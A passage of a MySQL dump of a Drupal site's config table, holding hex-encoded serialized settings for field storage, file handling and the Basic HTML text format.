('', 'field.storage.media.field_media_oembed_video', 0x613a31373a7b733a343a2275756964223b733a33363a2264643039336535362d306661642d346263622d623631372d353832386264633563346432223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a353a226d65646961223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22634e665f38353244712d664e6e53614d49344c784c2d4a364e37624c6b4875446244394555714f6e345f55223b7d733a323a226964223b733a33303a226d656469612e6669656c645f6d656469615f6f656d6265645f766964656f223b733a31303a226669656c645f6e616d65223b733a32343a226669656c645f6d656469615f6f656d6265645f766964656f223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a343a2274797065223b733a363a22737472696e67223b733a383a2273657474696e6773223b613a333a7b733a31303a226d61785f6c656e677468223b693a3235353b733a31343a22636173655f73656e736974697665223b623a303b733a383a2269735f6173636969223b623a303b7d733a363a226d6f64756c65223b733a343a22636f7265223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.media.field_media_video_file', 0x613a31373a7b733a343a2275756964223b733a33363a2266643561316133362d656232312d346535312d393730302d316639636438383937393634223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a343a2266696c65223b693a313b733a353a226d65646961223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a227a356d67626e315049565a35544e4d4279426d6976716f5f753352646b353855497a70794e34797054654d223b7d733a323a226964223b733a32383a226d656469612e6669656c645f6d656469615f766964656f5f66696c65223b733a31303a226669656c645f6e616d65223b733a32323a226669656c645f6d656469615f766964656f5f66696c65223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a343a2274797065223b733a343a2266696c65223b733a383a2273657474696e6773223b613a343a7b733a31313a227461726765745f74797065223b733a343a2266696c65223b733a31333a22646973706c61795f6669656c64223b623a303b733a31353a22646973706c61795f64656661756c74223b623a303b733a31303a227572695f736368656d65223b733a363a227075626c6963223b7d733a363a226d6f64756c65223b733a343a2266696c65223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.body', 0x613a31373a7b733a343a2275756964223b733a33363a2234653439333934322d323835662d343833612d616331322d613637333566316264346131223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a343a226e6f6465223b693a313b733a343a2274657874223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224542556f37714f577161695a61515f524339734c5935496f444b70685333347637375649485341436d5659223b7d733a323a226964223b733a393a226e6f64652e626f6479223b733a31303a226669656c645f6e616d65223b733a343a22626f6479223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a31373a22746578745f776974685f73756d6d617279223b733a383a2273657474696e6773223b613a303a7b7d733a363a226d6f64756c65223b733a343a2274657874223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a313b733a31343a22637573746f6d5f73746f72616765223b623a303b7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'field.storage.node.comment', 0x613a31373a7b733a343a2275756964223b733a33363a2231666334653337302d343062662d343635642d626639642d353531353535343964656436223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a373a22636f6d6d656e74223b693a313b733a343a226e6f6465223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226b74436e6139786d5776595a4955664f43557944517665646e3552746e533443526d4549774e6d76596a63223b7d733a323a226964223b733a31323a226e6f64652e636f6d6d656e74223b733a31303a226669656c645f6e616d65223b733a373a22636f6d6d656e74223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a373a22636f6d6d656e74223b733a383a2273657474696e6773223b613a313a7b733a31323a22636f6d6d656e745f74797065223b733a373a22636f6d6d656e74223b7d733a363a226d6f64756c65223b733a373a22636f6d6d656e74223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.field_activities_description', 0x613a31363a7b733a343a2275756964223b733a33363a2236653139636538342d633136332d346333312d386233622d323636323236313731613465223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a343a226e6f6465223b693a313b733a343a2274657874223b7d7d733a323a226964223b733a33333a226e6f64652e6669656c645f616374697669746965735f6465736372697074696f6e223b733a31303a226669656c645f6e616d65223b733a32383a226669656c645f616374697669746965735f6465736372697074696f6e223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a31373a22746578745f776974685f73756d6d617279223b733a383a2273657474696e6773223b613a303a7b7d733a363a226d6f64756c65223b733a343a2274657874223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.field_activities_download_file', 0x613a31363a7b733a343a2275756964223b733a33363a2232613531373665322d383937392d346636382d393661632d306263306339386566346539223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a343a2266696c65223b693a313b733a343a226e6f6465223b7d7d733a323a226964223b733a33353a226e6f64652e6669656c645f616374697669746965735f646f776e6c6f61645f66696c65223b733a31303a226669656c645f6e616d65223b733a33303a226669656c645f616374697669746965735f646f776e6c6f61645f66696c65223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a343a2266696c65223b733a383a2273657474696e6773223b613a343a7b733a31313a227461726765745f74797065223b733a343a2266696c65223b733a31333a22646973706c61795f6669656c64223b623a303b733a31353a22646973706c61795f64656661756c74223b623a303b733a31303a227572695f736368656d65223b733a363a227075626c6963223b7d733a363a226d6f64756c65223b733a343a2266696c65223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a2d313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.field_activities_img', 0x613a31363a7b733a343a2275756964223b733a33363a2261313230343532332d376166622d343361312d386133612d383038663138356661666537223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a333a7b693a303b733a343a2266696c65223b693a313b733a353a22696d616765223b693a323b733a343a226e6f6465223b7d7d733a323a226964223b733a32353a226e6f64652e6669656c645f616374697669746965735f696d67223b733a31303a226669656c645f6e616d65223b733a32303a226669656c645f616374697669746965735f696d67223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a353a22696d616765223b733a383a2273657474696e6773223b613a353a7b733a31313a227461726765745f74797065223b733a343a2266696c65223b733a31333a22646973706c61795f6669656c64223b623a303b733a31353a22646973706c61795f64656661756c74223b623a303b733a31303a227572695f736368656d65223b733a363a227075626c6963223b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b733a303a22223b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d7d733a363a226d6f64756c65223b733a353a22696d616765223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.field_activities_post_date', 0x613a31363a7b733a343a2275756964223b733a33363a2231326537313262642d623761372d346433362d383762612d323361316634393262396639223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a383a226461746574696d65223b693a313b733a343a226e6f6465223b7d7d733a323a226964223b733a33313a226e6f64652e6669656c645f616374697669746965735f706f73745f64617465223b733a31303a226669656c645f6e616d65223b733a32363a226669656c645f616374697669746965735f706f73745f64617465223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a383a226461746574696d65223b733a383a2273657474696e6773223b613a313a7b733a31333a226461746574696d655f74797065223b733a383a226461746574696d65223b7d733a363a226d6f64756c65223b733a383a226461746574696d65223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.field_announce_post_date', 0x613a31363a7b733a343a2275756964223b733a33363a2263323031386531302d376461632d343833312d396165642d613462656165623230653362223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a383a226461746574696d65223b693a313b733a343a226e6f6465223b7d7d733a323a226964223b733a32393a226e6f64652e6669656c645f616e6e6f756e63655f706f73745f64617465223b733a31303a226669656c645f6e616d65223b733a32343a226669656c645f616e6e6f756e63655f706f73745f64617465223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a383a226461746574696d65223b733a383a2273657474696e6773223b613a313a7b733a31333a226461746574696d655f74797065223b733a383a226461746574696d65223b7d733a363a226d6f64756c65223b733a383a226461746574696d65223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.field_center_description', 0x613a31363a7b733a343a2275756964223b733a33363a2236656464333138632d373739302d346163342d613133302d656633393133383361613530223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a343a226e6f6465223b693a313b733a343a2274657874223b7d7d733a323a226964223b733a32393a226e6f64652e6669656c645f63656e7465725f6465736372697074696f6e223b733a31303a226669656c645f6e616d65223b733a32343a226669656c645f63656e7465725f6465736372697074696f6e223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a31373a22746578745f776974685f73756d6d617279223b733a383a2273657474696e6773223b613a303a7b7d733a363a226d6f64756c65223b733a343a2274657874223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.field_center_download_file', 0x613a31363a7b733a343a2275756964223b733a33363a2263646663366331322d323566652d346665652d393833652d623966353139316633303535223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a343a2266696c65223b693a313b733a343a226e6f6465223b7d7d733a323a226964223b733a33313a226e6f64652e6669656c645f63656e7465725f646f776e6c6f61645f66696c65223b733a31303a226669656c645f6e616d65223b733a32363a226669656c645f63656e7465725f646f776e6c6f61645f66696c65223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a343a2266696c65223b733a383a2273657474696e6773223b613a343a7b733a31313a227461726765745f74797065223b733a343a2266696c65223b733a31333a22646973706c61795f6669656c64223b623a303b733a31353a22646973706c61795f64656661756c74223b623a303b733a31303a227572695f736368656d65223b733a363a227075626c6963223b7d733a363a226d6f64756c65223b733a343a2266696c65223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a2d313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.field_center_img', 0x613a31363a7b733a343a2275756964223b733a33363a2266373330303037612d656538382d346266662d613834622d343630333138363136353638223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a333a7b693a303b733a343a2266696c65223b693a313b733a353a22696d616765223b693a323b733a343a226e6f6465223b7d7d733a323a226964223b733a32313a226e6f64652e6669656c645f63656e7465725f696d67223b733a31303a226669656c645f6e616d65223b733a31363a226669656c645f63656e7465725f696d67223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a353a22696d616765223b733a383a2273657474696e6773223b613a353a7b733a31313a227461726765745f74797065223b733a343a2266696c65223b733a31333a22646973706c61795f6669656c64223b623a303b733a31353a22646973706c61795f64656661756c74223b623a313b733a31303a227572695f736368656d65223b733a363a227075626c6963223b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b733a303a22223b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d7d733a363a226d6f64756c65223b733a353a22696d616765223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.field_center_post_date', 0x613a31363a7b733a343a2275756964223b733a33363a2262343861623438642d636136362d343938322d623866392d613561366534336265666235223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a383a226461746574696d65223b693a313b733a343a226e6f6465223b7d7d733a323a226964223b733a32373a226e6f64652e6669656c645f63656e7465725f706f73745f64617465223b733a31303a226669656c645f6e616d65223b733a32323a226669656c645f63656e7465725f706f73745f64617465223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a383a226461746574696d65223b733a383a2273657474696e6773223b613a313a7b733a31333a226461746574696d655f74797065223b733a383a226461746574696d65223b7d733a363a226d6f64756c65223b733a383a226461746574696d65223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.field_description', 0x613a31363a7b733a343a2275756964223b733a33363a2237653735343365372d356233622d346362372d626632642d396461616139343065363437223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a343a226e6f6465223b693a313b733a343a2274657874223b7d7d733a323a226964223b733a32323a226e6f64652e6669656c645f6465736372697074696f6e223b733a31303a226669656c645f6e616d65223b733a31373a226669656c645f6465736372697074696f6e223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a393a22746578745f6c6f6e67223b733a383a2273657474696e6773223b613a303a7b7d733a363a226d6f64756c65223b733a343a2274657874223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.field_download_file', 0x613a31363a7b733a343a2275756964223b733a33363a2263653066386230382d313232382d343832622d393563342d336262363963326532316263223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a343a2266696c65223b693a313b733a343a226e6f6465223b7d7d733a323a226964223b733a32343a226e6f64652e6669656c645f646f776e6c6f61645f66696c65223b733a31303a226669656c645f6e616d65223b733a31393a226669656c645f646f776e6c6f61645f66696c65223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a343a2266696c65223b733a383a2273657474696e6773223b613a343a7b733a31313a227461726765745f74797065223b733a343a2266696c65223b733a31333a22646973706c61795f6669656c64223b623a303b733a31353a22646973706c61795f64656661756c74223b623a303b733a31303a227572695f736368656d65223b733a363a227075626c6963223b7d733a363a226d6f64756c65223b733a343a2266696c65223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a2d313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.field_image', 0x613a31373a7b733a343a2275756964223b733a33363a2239303633353637322d663661332d343063652d396335352d373532663232373139323932223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a333a7b693a303b733a343a2266696c65223b693a313b733a353a22696d616765223b693a323b733a343a226e6f6465223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2245796d6f6b6e6352495a37536751543249644f5168514a696358346e4e63304b3839696b2d4c786d4f4845223b7d733a323a226964223b733a31363a226e6f64652e6669656c645f696d616765223b733a31303a226669656c645f6e616d65223b733a31313a226669656c645f696d616765223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a353a22696d616765223b733a383a2273657474696e6773223b613a353a7b733a31313a227461726765745f74797065223b733a343a2266696c65223b733a31333a22646973706c61795f6669656c64223b623a303b733a31353a22646973706c61795f64656661756c74223b623a303b733a31303a227572695f736368656d65223b733a363a227075626c6963223b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b4e3b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d7d733a363a226d6f64756c65223b733a353a22696d616765223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a313a7b733a393a227461726765745f6964223b613a313a7b693a303b733a393a227461726765745f6964223b7d7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.field_slider_img', 0x613a31363a7b733a343a2275756964223b733a33363a2263626230643634622d356335362d343633342d623634662d323462613431656662663662223b733a383a226c616e67636f6465223b733a323a226b6f223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a333a7b693a303b733a343a2266696c65223b693a313b733a353a22696d616765223b693a323b733a343a226e6f6465223b7d7d733a323a226964223b733a32313a226e6f64652e6669656c645f736c696465725f696d67223b733a31303a226669656c645f6e616d65223b733a31363a226669656c645f736c696465725f696d67223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a353a22696d616765223b733a383a2273657474696e6773223b613a353a7b733a31313a227461726765745f74797065223b733a343a2266696c65223b733a31333a22646973706c61795f6669656c64223b623a303b733a31353a22646973706c61795f64656661756c74223b623a303b733a31303a227572695f736368656d65223b733a363a227075626c6963223b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b733a303a22223b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d7d733a363a226d6f64756c65223b733a353a22696d616765223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.node.field_tags', 0x613a31373a7b733a343a2275756964223b733a33363a2238383338306361342d333738362d343734382d623464362d343766313062653037623432223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a343a226e6f6465223b693a313b733a383a227461786f6e6f6d79223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2257704f455f62733842735f4859326e73376e32725f5f64652d786e6f302d42786b716570352d4d73484173223b7d733a323a226964223b733a31353a226e6f64652e6669656c645f74616773223b733a31303a226669656c645f6e616d65223b733a31303a226669656c645f74616773223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a343a2274797065223b733a31363a22656e746974795f7265666572656e6365223b733a383a2273657474696e6773223b613a313a7b733a31313a227461726765745f74797065223b733a31333a227461786f6e6f6d795f7465726d223b7d733a363a226d6f64756c65223b733a343a22636f7265223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a2d313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a303a7b7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field.storage.user.user_picture', 0x613a31373a7b733a343a2275756964223b733a33363a2230316431646566372d663565632d343365382d613533332d356330643233393238666563223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a333a7b693a303b733a343a2266696c65223b693a313b733a353a22696d616765223b693a323b733a343a2275736572223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a223071382d6d7738792d4c73354935373873495051464c70346c6a70483757765659707a592d49394f2d3845223b7d733a323a226964223b733a31373a22757365722e757365725f70696374757265223b733a31303a226669656c645f6e616d65223b733a31323a22757365725f70696374757265223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a343a2274797065223b733a353a22696d616765223b733a383a2273657474696e6773223b613a353a7b733a31313a227461726765745f74797065223b733a343a2266696c65223b733a31333a22646973706c61795f6669656c64223b623a303b733a31353a22646973706c61795f64656661756c74223b623a303b733a31303a227572695f736368656d65223b733a363a227075626c6963223b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b4e3b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d7d733a363a226d6f64756c65223b733a353a22696d616765223b733a363a226c6f636b6564223b623a303b733a31313a2263617264696e616c697479223b693a313b733a31323a227472616e736c617461626c65223b623a313b733a373a22696e6465786573223b613a313a7b733a393a227461726765745f6964223b613a313a7b693a303b733a393a227461726765745f6964223b7d7d733a32323a22706572736973745f776974685f6e6f5f6669656c6473223b623a303b733a31343a22637573746f6d5f73746f72616765223b623a303b7d),
('', 'field_ui.settings', 0x613a323a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2251316e4d69393057365951784b7a5a41674a51773741673955344a72734555776b6f6d46306c687662494d223b7d733a31323a226669656c645f707265666978223b733a363a226669656c645f223b7d),
('', 'file.settings', 0x613a353a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2230614d6b6f58596e6178355f7448493943397a48732d4b34384b4a364b37355048744439782d306e62674d223b7d733a31313a226465736372697074696f6e223b613a323a7b733a343a2274797065223b733a393a22746578746669656c64223b733a363a226c656e677468223b693a3132383b7d733a343a2269636f6e223b613a313a7b733a393a226469726563746f7279223b733a32333a22636f72652f6d6f64756c65732f66696c652f69636f6e73223b7d733a33353a226d616b655f756e757365645f6d616e616765645f66696c65735f74656d706f72617279223b623a303b733a32313a2266696c656e616d655f73616e6974697a6174696f6e223b613a363a7b733a31333a227472616e736c69746572617465223b623a303b733a31383a227265706c6163655f77686974657370616365223b623a303b733a32343a227265706c6163655f6e6f6e5f616c7068616e756d65726963223b623a303b733a32323a2264656475706c69636174655f736570617261746f7273223b623a303b733a393a226c6f77657263617365223b623a303b733a32313a227265706c6163656d656e745f636861726163746572223b733a313a222d223b7d7d),
('', 'filter.format.basic_html', 0x613a393a7b733a343a2275756964223b733a33363a2231636231313234622d333266392d346235372d386331622d363536323430353930396466223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a22656469746f72223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22526a6f4a50514c43414538753159735f79434b7562706b596c527a5f4f7931326135714356654e49484a38223b7d733a343a226e616d65223b733a31303a2242617369632048544d4c223b733a363a22666f726d6174223b733a31303a2262617369635f68746d6c223b733a363a22776569676874223b693a303b733a373a2266696c74657273223b613a363a7b733a32313a22656469746f725f66696c655f7265666572656e6365223b613a353a7b733a323a226964223b733a32313a22656469746f725f66696c655f7265666572656e6365223b733a383a2270726f7669646572223b733a363a22656469746f72223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a31313b733a383a2273657474696e6773223b613a303a7b7d7d733a31323a2266696c7465725f616c69676e223b613a353a7b733a323a226964223b733a31323a2266696c7465725f616c69676e223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a373b733a383a2273657474696e6773223b613a303a7b7d7d733a31343a2266696c7465725f63617074696f6e223b613a353a7b733a323a226964223b733a31343a2266696c7465725f63617074696f6e223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a383b733a383a2273657474696e6773223b613a303a7b7d7d733a31313a2266696c7465725f68746d6c223b613a353a7b733a323a226964223b733a31313a2266696c7465725f68746d6c223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a2d31303b733a383a2273657474696e6773223b613a333a7b733a31323a22616c6c6f7765645f68746d6c223b733a3234333a223c62723e203c703e203c68322069643e203c68332069643e203c68342069643e203c68352069643e203c68362069643e203c636974653e203c646c3e203c64743e203c64643e203c6120687265666c616e6720687265663e203c626c6f636b71756f746520636974653e203c756c20747970653e203c6f6c20737461727420747970653e203c7374726f6e673e203c656d3e203c636f64653e203c6c693e203c696d672073726320616c7420646174612d656e746974792d7575696420646174612d656e746974792d747970652068656967687420776964746820646174612d63617074696f6e20646174612d616c69676e3e223b733a31363a2266696c7465725f68746d6c5f68656c70223b623a303b733a32303a2266696c7465725f68746d6c5f6e6f666f6c6c6f77223b623a303b7d7d733a32343a2266696c7465725f68746d6c5f696d6167655f736563757265223b613a353a7b733a323a226964223b733a32343a2266696c7465725f68746d6c5f696d6167655f736563757265223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a393b733a383a2273657474696e6773223b613a303a7b7d7d733a32323a2266696c7465725f696d6167655f6c617a795f6c6f6164223b613a353a7b733a323a226964223b733a32323a2266696c7465725f696d6167655f6c617a795f6c6f6164223b733a383a2270726f7669646572223b733a363a2266696c746572223b733a363a22737461747573223b623a313b733a363a22776569676874223b693a31323b733a383a2273657474696e6773223b613a303a7b7d7d7d7d),
